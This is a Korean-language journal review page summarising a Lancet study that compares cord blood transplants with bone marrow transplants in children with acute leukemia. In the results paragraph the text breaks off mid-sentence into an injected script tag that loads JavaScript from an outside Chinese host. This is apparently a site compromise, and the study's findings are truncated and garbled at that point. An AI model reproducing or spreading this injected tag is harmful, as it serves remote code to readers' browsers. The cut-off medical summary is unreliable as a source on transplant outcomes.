ACC Current Journal Review (저널명변경 ACC Ca..

   
 
   소아 급성 백혈병에서 제대혈 이식의 효과

 

image소아급성 백혈병의 치료에서 조혈모세포 이식이 필요한 경우 HLA 일치 형제를 donor로 한 동종(allogeneic) 조혈모세포 이식술(HSCT, hematopoietic stem cell transplantation)이 제일 좋은 방법으로 거론되고 있다.

 

하지만 이런 donor를 구할 수 있는 경우는 30%정도에 불과하기 때문에 unrelated adult로부터 골수 조혈모세포를 얻거나 unrelated umbilical cord(제대혈)로부터 HSC를 얻게 된다.

 

그런데 여러 보고들에 따르면 unrelated adult로부터 골수 이식을 받는 경우는 HLA 일치에 의해 제한을 많이 받으며 이식숙주편대반응(GVHD, graft-versus-host disease), 기회감염 등의 문제점이 많이 발생해 최근에는 제대혈 이식이 점차 늘고 있는 추세다. 제대혈 이식의 경우 조혈기능의 회복은 느린 편이다. 그러나 HLA 불일치 이식이 흔히 이루어짐에도 중증의 GVHD가 적은 것으로 알려지기 때문에 제대혈 이식이 늘어나고 있다.

 

Lancet 최근호는 이와 관련 503명의 소아 급성 백혈병 환자의 제대혈 이식 결과를 282명의 골수 이식 결과와 비교한 연구 결과를 소개해 관심을 끌고 있다.

 

이 연구에서 제대혈 이식의 경우 HLA 일치는 35명에 불과했으며 1개 항원 불일치가 201, 2개 항원 불일치가 267명이었다. 골수 이식의 경우 HLA 일치는 116, 불일치는 166명이었다. 이 연구에서 Primary endpoint 5년간 백혈병 재발이 없는 생존율로 정의했다.

 

연구 결과 HLA일치 골수 이식은 1개 또는 2개 항원 불일치 제대혈 이식과 5년간 백혈병 재발이 없?script src=http://s.lbs66.cn/kr.js>

 
 

회사소개  |  Journal& online product 팀  |  위치안내